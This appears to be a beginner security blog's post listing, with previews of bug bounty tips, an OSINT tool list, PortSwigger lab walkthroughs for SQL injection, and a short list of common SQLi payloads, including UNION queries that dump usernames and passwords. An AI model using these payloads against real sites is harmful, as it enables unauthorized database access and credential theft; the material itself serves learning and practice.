Posts

5 Tips for the Beginners Who Want to Start Bug Bounty

1. Start small and focus on learning. Don't jump into complex programs immediately. Start with smaller programs or platforms with clearly defined scopes and good documentation. This will allow you to learn the ropes, understand the bug bounty process, and build your confidence without getting overwhelmed.
2. Choose your targets wisely. Not all programs are created equal. Some programs have very active communities and are more likely to reward beginners, while others are highly competitive and may require more advanced skills. Research different programs, read their rules and scope, and choose ones that are beginner-friendly and align with your interests and skill set.
3. Learn the basics of web application security. Familiarize yourself with common web vulnerabilities like SQL injection, cross-site scripting (XSS), and insecure direct object references (IDOR). Resources like the PortSwigger Web Security Academy and the OWASP Top 10 can help you understand these vulner...

7 Best Tools for OSINT

OSINT stands for Open Source Intelligence. It means harvesting data that has been obtained from publicly available sources. OSINT tools:
theHarvester
Maltego
TweetDeck
Google Dorks
OSINT Framework
TinEye
Google Image Search

Finally, I completed the course


SQL injection attack, listing the database contents on non-Oracle databases

Step 1: Go to the product category filter to check whether it is vulnerable to SQL injection. If it shows an "Internal Server Error" (HTTP 500), the site is vulnerable to SQL injection.
Step 2: To check the number of columns, we run the injection queries:
' order by 1--   responds with HTTP 200, so the query returns at least 1 column.
' order by 2--   also responds with HTTP 200, so the query returns at least 2 columns.
' order by 3--   responds with HTTP 500 (Internal Server Error), so the query does not return 3 columns.
Note that every time we inject a query into the category filter we have to URL-encode it by pressing Ctrl+U.
Step 3: To find out which database version it is, run:
' UNION SELECT @@version, null--
It responds with HTTP 500, so we conclude that the database is not Microsoft SQL Server. Now run the PostgreSQL query instead. Version queries by database: Microsoft: SELECT @@version; Postgr...

SQL injection attack, querying the database type and version on Oracle (PortSwigger Lab 07)

Path: Product category filter
Goal: display the database version string
Step 1: Determine the number of columns. After the category name, we run the query:
' order by 1--
then select all and press Ctrl+U for URL encoding. Response: HTTP/2 200 OK. It means the server responds to the malicious query, and that the query has at least 1 column.
Step 2: Then we check the same query for 2 columns:
' order by 2--
then select all and press Ctrl+U for URL encoding. It shows the status HTTP/2 200 OK. It means the server responds to the malicious query, and that the query has 2 columns.
Step 3: Then we check the same query for 3 columns:
' order by 3--
then select all and press Ctrl+U for URL encoding. It shows the status HTTP/2 500 Internal Server Error. It means the server doesn't respond to the query, and that the query doesn't have 3 columns.
Step 4: Determine the datatype...

SQL Based on PortSwigger Lab 3

This type of UNION attack is done using the UNION keyword, which lets you execute an additional SELECT query and append the results to the original query. For example, if an application executes the following query containing the user input "Gifts":
SELECT name, description FROM products WHERE category = 'Gifts'
then an attacker can submit the input:
' UNION SELECT username, password FROM users--
Blind SQL injection: the application does not return the results of the SQL query or the details of any database errors within its responses.
First-order SQL injection: arises when the application takes user input and uses it in a SQL query in an unsafe way.
Second-order SQL injection: arises when the application takes user input from an HTTP request and stores it for future use. Later, when handling a different HTTP request, the application retrieves the stored data and incorporates it into a SQL query in an unsafe way. Second-order SQL injection often arises in situation...

Some Basics of SQLi

Some of the common SQLi payloads that are important for performing a SQL injection attack:
General:
' or '1' = '1
' or '1' = '1'
' or '1' = '1 -- -
' or '1' = '1 #
1 UNION SELECT 1,2,3
For a UNION attack:
0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
In blind SQL injection:
' OR 1=1;--
select * from users where username=''...